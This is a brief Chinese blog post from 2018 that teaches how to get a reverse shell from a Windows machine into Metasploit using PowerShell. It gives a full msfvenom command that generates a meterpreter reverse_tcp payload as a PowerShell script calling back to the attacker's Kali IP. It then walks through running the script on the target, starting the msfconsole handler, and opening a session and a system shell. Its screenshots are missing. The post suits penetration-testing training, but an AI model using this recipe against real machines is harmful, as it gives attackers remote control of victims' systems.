利用powerShell 反弹shell到metasploit

一、使用工具kali linux,windows severe msfvenom msfconsole

二、使用msfvenom生成ps1格式的Powershell脚本

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXXXX(你自己kali本机IP) LPORT=XXXX(自己随便设置) -f psh-reflection >xxx.ps1

将生成的Powershell脚本下载并上传至windows机器中

三、启动Msfconsole

选择模块

设置payload

设置完成后执行run

在windows机器中执行powershell脚本,此时攻击机器中会显示如果下结果

 

如果攻击主机中显示通道已经建立但是未拿到相应的shell 如图:

 回车进入:

msf exploit(handler)> 

输入:sessions -l 查看信息

 

输入 seeions 1 就会拿到想要的meterpreter

 

在meterpreter中输入shell 即可拿到相应的shell

后续可以操作 一些相关命令。

 

posted @ 2018-03-19 10:17  Cheng_Hunyo  阅读(7857)  评论(0)    收藏  举报